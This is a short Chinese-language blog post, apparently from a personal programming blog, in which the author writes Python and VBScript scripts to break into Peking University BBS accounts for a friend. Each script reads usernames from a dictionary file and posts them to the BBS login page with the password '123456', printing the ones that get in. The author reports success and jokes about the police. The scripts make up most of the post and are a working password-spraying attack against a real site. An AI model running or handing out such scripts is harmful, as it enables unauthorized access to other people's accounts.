Deep BlueVBScriptWMIPHPC语言JavaScriptWindows API路由器Windows函数Python | Python牛刀小试今天有个朋友问我有没有北大BBS的账号。真奇怪,我又不是北大的,怎么会有北大BBS的账号?我让她问她北大的朋友要,她说她没有北大的朋友。 难道真的要我破解一个么?算了,正好试试我的Python水平。 #coding: gbk import httplib, urllib def Check(username, password): params = urllib.urlencode( {'userid': username, 'passwd': password}) headers = {"Content-type": "application/x-www-form-urlencoded"} conn = httplib.HTTPSConnection("") conn.request("POST", "/bbs/bbslog2.php", params, headers) res = conn.getresponse().read() conn.close() if res.find("密码不正确") != -1: return False elif res.find("不存在这个用户") != -1: return False else: return True for i in open("English.Dic"): if Check(i.rstrip(),"123456"): print i 顺便也写了个VBS版的,感觉貌似VBS比较快,感觉出问题了?
Dim fso Set fso = CreateObject("scripting.filesystemobject") With fso.OpenTextFile("English.Dic",1) Do Until .AtEndOfStream id = .ReadLine If Check(id,"123456") Then WScript.Echo id & vbTab &"OK" End If Loop End With Function Check(username,password) Dim http Set http = CreateObject("Msxml2.XMLHTTP") _ "POST","",False http.setRequestHeader _ "Content-Type","application/x-www-form-urlencoded" http.send "userid=" & username & "&passwd=" & password response = AnsiToUnicode(http.responseBody) If InStr(response,"密码不正确") Then Check = False ElseIf InStr(response,"不存在这个用户") Then Check = False Else Check = True End If End Function Function AnsiToUnicode(str) Dim ado Set ado = CreateObject("") ado.Type = 1 ado.Open ado.Write str ado.Position = 0 ado.Type = 2 ado.Charset = "gb2312" AnsiToUnicode = ado.ReadText End Function 事实证明,123456真是一个无敌的密码。但愿晚上没有警察叔叔敲门。 |